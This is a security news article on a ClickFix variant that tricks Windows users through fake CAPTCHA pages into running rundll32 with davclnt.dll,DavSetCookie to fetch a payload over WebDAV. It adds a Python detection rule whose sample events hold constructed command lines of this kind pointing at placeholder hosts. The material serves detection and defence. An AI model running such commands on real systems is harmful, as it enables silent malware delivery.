ClickFix Variant - New Malware Evades PowerShell Detection
Basically, a new malware trick uses Windows tools to sneak in without being noticed.
A new ClickFix variant is exploiting Windows tools to deliver malware undetected. Windows users are at risk as this stealthy technique bypasses traditional security measures. Organizations must enhance their defenses to counteract this evolving threat.
What Happened
A new and more dangerous version of the ClickFix attack technique has emerged, targeting Windows users. Unlike previous versions that relied on PowerShell or mshta, this variant cleverly uses rundll32.exe and WebDAV to execute harmful commands. This method allows attackers to deliver and run malicious payloads quietly, without triggering typical security alerts.
The attack begins with a fake website, disguised as a CAPTCHA verification page. Users are tricked into executing a command that seems harmless. This social engineering tactic is effective because it preys on users' lack of knowledge about such threats. The site instructs users to open the Windows Run dialog and paste a command, making the attack appear legitimate.
Who's Being Targeted
This variant primarily targets Windows users, particularly those in organizations with security measures focused on detecting script-based threats. The use of rundll32.exe makes it difficult for security systems to identify the malicious activity. Since rundll32 is a trusted system tool, the attack blends in with normal Windows operations, making detection challenging.
Security teams may overlook the early stages of this attack, as it does not initiate through common scripting engines. This stealthy approach significantly increases the risk for organizations that are not prepared to detect such tactics.
Signs of Infection
Once the initial command is executed, the malware enters a multi-stage process that remains largely in memory. It eventually transitions to PowerShell, using commands that avoid writing files to disk, further evading detection. The core payload, named SkimokKeep, employs various advanced techniques to avoid detection, including using a hashing algorithm to obscure its actions.
The malware also conducts checks to identify if it is running in a sandbox or virtual machine environment. If it detects such conditions, it may alter its behavior or cease execution altogether. This makes it particularly insidious, as it can maintain access while remaining hidden.
How to Protect Yourself
To defend against this new ClickFix variant, security teams should monitor all executions of rundll32.exe that include davclnt.dll and DavSetCookie arguments. Implementing command-line auditing for known LOLbins like rundll32 can help catch unusual usage patterns early.
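The monitoring rule described above, written out as a small detection routine over process-creation events. This is an added example, not code from the original article or from any vendor; the event records and the hosts/URLs in them are constructed, and it assumes each event carries only an image path and a command line.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample process-creation events (image + command line). Not real telemetry;
# the hosts and URLs are placeholders in documentation/invalid ranges.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie example.invalid http://example.invalid/share/file.txt'},
    {"image": r"C:\Windows\SysWOW64\RUNDLL32.EXE",
     "cmdline": r'"C:\Windows\SysWOW64\RUNDLL32.EXE" davclnt.dll , DavSetCookie 203.0.113.10@80 http://203.0.113.10/s/p'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},   # benign rundll32 use
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"svchost.exe -k netsvcs -p -s WebClient"},            # WebClient service, not rundll32
]

# rundll32 invoking the DavSetCookie export of davclnt.dll. Tolerates a full DLL path,
# quoting, mixed case and whitespace around the comma so trivial variations don't slip past.
DAV_RE = re.compile(
    r'(?:^|[\s"\\])davclnt\.dll\s*,\s*DavSetCookie\b(?P<args>.*)$',
    re.IGNORECASE,
)
# WebDAV target handed to DavSetCookie: an http(s) URL or a UNC path, captured for triage.
URL_RE = re.compile(r'https?://\S+|\\\\\S+', re.IGNORECASE)


@dataclass
class Finding:
    image: str
    remote: Optional[str]   # WebDAV host/URL to investigate or block; None if not present


def is_rundll32(image: str) -> bool:
    """True if the process image is rundll32 (any path, any case, with or without .exe)."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in ("rundll32", "rundll32.exe")


def detect_davsetcookie(event: dict) -> Optional[Finding]:
    """Return a Finding when rundll32 loads davclnt.dll,DavSetCookie; otherwise None."""
    if not is_rundll32(event["image"]):
        return None
    m = DAV_RE.search(event["cmdline"])
    if not m:
        return None
    url = URL_RE.search(m.group("args"))
    return Finding(image=event["image"], remote=url.group(0) if url else None)


def scan(events) -> list:
    """Run the rule over a batch of events and keep only the hits."""
    return [f for f in (detect_davsetcookie(e) for e in events) if f]
```

The `remote` field gives the outbound WebDAV destination, which is the value to correlate with the port 80 WebDAV traffic monitoring mentioned in the next paragraph.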
Organizations should also restrict or closely monitor outbound WebDAV traffic on port 80 and block connections to known malicious IP addresses. User awareness training is crucial, focusing on recognizing fake CAPTCHA pages and ClickFix-style social engineering attacks. This training can help mitigate the risk, as the success of the campaign relies heavily on user compliance with on-screen instructions.